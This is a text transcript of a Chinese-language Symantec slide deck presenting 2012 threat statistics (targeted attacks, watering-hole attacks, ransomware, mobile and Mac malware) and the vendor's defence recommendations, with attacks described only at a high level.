賽門鐵克全球網路安全威脅研究報告icstwebstorage.blob.core.windows.net... · advanced...
TRANSCRIPT
賽門鐵克全球網路安全威脅研究報告
第18期
台灣賽門鐵克資深技術顧問 張士龍
2012年網路安全威脅現象 I
小型企業成為駭客攻擊的新目標
• 針對性攻擊事件數量激增四成以上(42%)
• 三分之一(31%)的針對性攻擊是瞄準250名員工以下的企業
• 少於250人的小型企業遭受針對式攻擊的比例,從2011年的18%成長到2012年的31%
Presentation Identifier Goes Here 2
2012年網路安全威脅現象 II
駭客集團環伺周圍
• Elderwood是近三年來的新興網路組織,而有些駭客集團
攻擊目的不僅僅著眼於商業利益
• 攻擊目標愈見精準、攻擊手法益發精密
• 新興的水坑攻擊(watering hole),能在短時間內造成大規模損害
Presentation Identifier Goes Here 3
2012年網路安全威脅現象 III
行動裝置最大的威脅並非漏洞,而是惡意程式
• 行動惡意程式數量激增58%
• 惡意程式家族數量和變種惡意程式比例從1:5增加到1:38,呈現戲劇性成長
• 行動裝置作業系統漏洞激增,自2011年315個,成長到去年415個漏洞,成長幅度超過三成(31%)。儘管目前看來漏洞數
量與惡意程式無關,但難保未來不被利用
• 五成以上的手機惡意軟體的設計目的是竊取資訊及追蹤使用
者動態,而他們最終極的目的是獲利
Presentation Identifier Goes Here 4
2012年網路安全威脅現象 III
Presentation Identifier Goes Here 5
2012年網路安全威脅現象 IV
蘋果電腦不再安全
• Mac惡意程式數量自2011年6個家族成長至2012年10個家族,增幅高達66%
• 在Mac上發現的威脅中,僅有2.5%是專為Mac而寫的惡意程式;然而,一個威脅卻能感染高達60萬台蘋果電腦!
Presentation Identifier Goes Here 6
報告重點
• 針對式攻擊
• 漏洞攻擊
• 行動惡意程式
• Mac安全威脅
Internet Security Threat Report 2013 :: Volume 18 7
針對式攻擊
Internet Security Threat Report 2013 :: Volume 18 8 8
Internet Security Threat Report 2013 :: Volume 18
2012年針對式攻擊次數
增加 42%
9
小型企業成為駭客攻擊的新目標
Internet Security Threat Report 2013 :: Volume 18 10
50%
9%
2% 3%
5%
31% 18% in 2011
2,501人以上的企業 2,501人以下的企業
1,501~2,500
1,001~1,500
501~1,000
251~500
1~250
製造業躍升為針對式攻擊目標首位
Internet Security Threat Report 18 12
24%
19%
17%
8%
10%
2%
2% 2%
1%
3%
針對性攻擊職務類別分佈變化
Presentation Identifier Goes Here 13 13
Internet Security Threat Report 2013 :: Volume 18 14
感染網站並等待使用者上鉤
水坑式攻擊
寄電子郵件給 目標攻擊對象
魚叉式網路釣魚
攻擊手法愈見精準、受害規模愈來愈大
什麼是水坑式攻擊?
Presentation Identifier Goes Here 15
1. 攻擊者會分析被害者平時喜歡瀏覽網站
2. 攻擊者開始測試網站所存在的漏洞
3. 攻擊者入侵網站伺服器後,駭客 透過Inject JavaScript 或 HTML ,以重導式攻擊讓受害者執行惡意程式碼
4. 已經被入侵的網站伺服器現在正等待零時差攻擊讓受害者上鉤
1個水坑式攻擊
可在24小時內
Internet Security Threat Report 2013 :: Volume 18 16
水坑式攻擊能在短時間內造成大規模損害
感染500家企業
水坑式攻擊案例
• 2013年,水坑式攻擊將會被廣泛使用
• 今年二月份,數個知名企業淪為水坑式攻擊的受害者
Internet Security Threat Report 2013 :: Volume 18 17
水坑式攻擊鎖定iOS開發者
Internet Security Threat Report 2013 :: Volume 18 18
Internet Security Threat Report 2013 :: Volume 18 19
.jar file
CVE-2013-1493
Svchost
.jpg
appmgmt.dll
Request Web Page 1
2
Request svchost.jpg 3
Svchost.jpg 4
5
Contact C&C server 6
C&C Server 110.173.55.187
“Water Hold” Compromised Web Server
水坑式攻擊案例 – 結合 Java 零時差漏洞
2
Internet Security Threat Report 2013 :: Volume 18 20
漏洞攻擊
總數量
Stuxnet
Elderwood
2006
14
2007 2008 2009 2010 2011 2012 0
2
4
6
8
10
12
14
16
13
15
9
12
14
8
4
2
3 4
Internet Security Threat Report 2013 :: Volume 18 21
• 單一群組能顯著影響年度漏洞數量
• Elderwood 為零時差漏洞數量成長的主要原因
零時差漏洞攻擊
Internet Security Threat Report 2013 :: Volume 18 22
漏洞數量未有顯著變化
網頁式攻擊成長30%
Internet Security Threat Report 2013 :: Volume 18 23
許多網站會對使用者造成損害
Internet Security Threat Report 2013 :: Volume 18 24
53% 的合法網站有未修補的漏洞
24% 的網站有重大未修補的漏洞
61% 的惡意網站為合法網站
25
1個惡意威脅感染超過 100萬網站! 偽裝成防毒軟體
下次你遇上的,
可能就是勒索軟體!
Liza
許多網站會對使用者造成損害
Internet Security Threat Report 2013 :: Volume 18
26 Internet Security Threat Report 2013 :: Volume 18
不付錢就撕票
Presentation Identifier Goes Here 27
勒索軟體持續橫行
Presentation Identifier Goes Here 28
電腦重要檔案被惡意加鎖
Presentation Identifier Goes Here 29
勒索軟體 (Ransomware)
Internet Security Threat Report 2013 :: Volume 18 30
16 組罪犯集團參與此網路犯罪
去年受害者被敲詐的金額總計約為
1億5,000萬台幣
一個威脅在18天的周期內產生的平均攻擊次數為
500,000次
Internet Security Threat Report 2013 :: Volume 18 31
行動惡意程式
Android 惡意程式成長概況
32
5,000
4,500
4,000
3,500
3,000
2,500
2,000
1,500
1,000
500
0
Cumulative Android Families 2011-2012
Cumulative Android Variants 2011-2012
Internet Security Threat Report 2013 :: Volume 18
惡意程式家族數量和變種惡意程式比例從1:5增加到1:38
漏洞多寡與行動惡意程式數量無關
儘管行動作業系統的漏洞的數量與惡意程式數量沒有明顯的關係,但這樣的狀況在未來可能會改變
Internet Security Threat Report 2013 :: Volume 18 33
作業系統 漏洞數量
Apple iOS 387
Android 13
Blackberry 13
Windows Mobile
2
裝置類型 惡意程式數量
Apple iOS 1
Android 103
Symbian 3
Windows 1
行動惡意程式的設計目的
Internet Security Threat Report 2013 :: Volume 18 34
竊取資訊
傳統威脅
追蹤使用者
傳送訊息
惡意廣告
更改裝置設定
Internet Security Threat Report 2013 :: Volume 18 35
竊取資訊的惡意程式
以Android.Sumzand為例…
1. 使用者收到內含應用程式下載的電子郵件
2. 竊取聯絡人資訊
3. 寄送推銷應用程式下載的電子郵件寄給所有聯絡人
35
假冒防毒軟體
Internet Security Threat Report 2013 :: Volume 18 36
假冒防毒軟體
Presentation Identifier Goes Here 37
假冒防毒軟體
Presentation Identifier Goes Here 38
假冒防毒軟體
Presentation Identifier Goes Here 39
Internet Security Threat Report 2013 :: Volume 18 40
Mac安全威脅
40
Mac惡意程式家族數量激增
Internet Security Threat Report 2013 :: Volume 18 41
以惡意程式數量來看, 使用Mac似乎比較安全….
Internet Security Threat Report 2013 :: Volume 18 42
Only 2.5% of threats found on
Macs are Mac malware
Internet Security Threat Report 2013 :: Volume 18 43
But in 2012
1 Mac Threat infected 600,000
Machines.
相較PC惡意程式,針對Mac的惡意程式破壞力更強!
Internet Security Threat Report 17 44
企業防護之道
Symantec Defenses
Advanced Persistent Threats: Cutting Through the Hype 45
Detect, Prevent, Monitor and Analyze
Protect endpoints from malware and data loss. Provide strong authentication to ensure the user and devices are trusted.
Protect critical servers and systems with sensitive data.
Provide global and local threat intelligence and correlation through threat monitoring
and reporting services
Stop inbound malware attacks, outbound callbacks, and data loss at the gateway.
• Manage Security Services (MSS)
• Symantec Security Assessment Services
• DeepSight Intelligent Services
• Managed PKI
• VIP Authentication Service
• Skeptic
• Attachement Filtering
• Endpoint Protection
• Network Access Control
• VIP Client
• Mobile Management
• Endpoint Protection Mobile Edition
• DLP for Tablet
• Critical System Protection
• Endpoint Protection
• Control Compliance Suite
• DLP Protection
• File/Email Encryption
• Altiris Management Suite
• Security Information Manager
• Mail Security for Exchange/Domino
• Two-factor Authentication
• Protection Center
• Endpoint Protection
• DLP Endpoint Prevention
• Endpoint Encryption
• Control Compliance Suite
• Altiris Management Suite
惡意程式防護
Internet Security Threat Report, Vol. 17
• Use more than just AV – use full functionality of endpoint protection including heuristics, reputation-based, behavior-based and other technologies
• Restrict removable devices and turn off auto-run to prevent malware infection Layered Endpoint Protection
• Ensure employees become the first line of defense against socially engineered attacks, such as phishing, spear phishing, and other types of attacks Security Awareness Training
• Detect and block new and unknown threats based on global reputation and ranking Advanced Reputation Security
• Monitor globally for network intrusions, propagation attempts and other suspicious traffic patterns, including using reputation-based technologies
• Network protection is more than just blacklisting Layered Network Protection
46
目標式攻擊防護
Internet Security Threat Report, Vol. 17
• Detect and block new and unknown threats based on global reputation and ranking
• Use true host-based intrusion detection and prevention technologies to set strong permissions around applications, servers and clusters, according to sensitivity of information processed
• Restrict removable devices and functions to prevent malware infection
Advanced Reputation Security
Employ Offensive Protection Strategies
Removable Media Device Control
• Scan and monitor inbound/outbound email and web traffic and block accordingly
• Discover data spills of confidential information that are targeted by attackers • Detect and prevent exfiltration of confidential information that are targeted by
attackers
• Create and enforce security policies so all confidential information is encrypted
Email & Web Gateway Filtering
Data Loss Prevention
Encryption
• Monitor globally for network intrusions, propagation attempts and other suspicious traffic patterns, including using reputation-based technologies
Network Threat and Vulnerability Monitoring
47
資料外洩防護
Internet Security Threat Report, Vol. 17
• Determine what sensitive information exists in your organization • Categorize it appropriately and protect it according to its classification level
• Detect and prevent exfiltration of sensitive information that is targeted by attackers
• Enforce rules prohibiting access of confidential data using applications
• Locks down key systems that contain confidential information • Prevents any unauthorized code to run — independent of AV signatures
Data Classification
Data Loss Prevention
Host-based Intrusion Detection and Prevention
• Scan and monitor inbound/outbound email and web traffic and block accordingly
• Create and enforce security policy so all confidential information is encrypted
Email & Web Gateway Filtering
Encryption
• Use two-factor authentication to protect against credential theft Strong Authentication
48
行動裝置威脅防護
Internet Security Threat Report, Vol. 17
• Remotely wipe devices in case of theft or loss • Update devices with applications as needed without physical access • Get visibility and control of devices, users and applications
Device Management
• Guard mobile device against malware and spam • Prevent the device from becoming a vulnerability • Enforce compliance across organization, including security standards &
passwords
Device Security
• Identify confidential data on mobile devices and use technologies to prevent future exposure
• Protect data from moving between applications • Encrypt mobile devices to prevent lost devices from turning into lost
confidential data
Content Security
• Provide strong authentication and authorization for access to enterprise applications and resources
• Ensure safe access to enterprise resources from right devices with right postures
Identity and Access
49
企業安全防護建議
• 採用縱深防禦策略,加強重重防禦關卡,以形成一個可互補的防禦系統,避免因任何單一環節出現安全問題。
• 網路端:加強網頁安全與流量檢測分析。
• 伺服器端:異常行為分析能力
• 端點部份:自動化端點防護機制(標準化檢測)
• 加強用戶端的管理, 以及使用者的安全教育。
Internet Security Threat Report, Vol. 17 50
Thank you!
Copyright © 2010 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Thank you!
Internet Security Threat Report 2013 :: Volume 18 53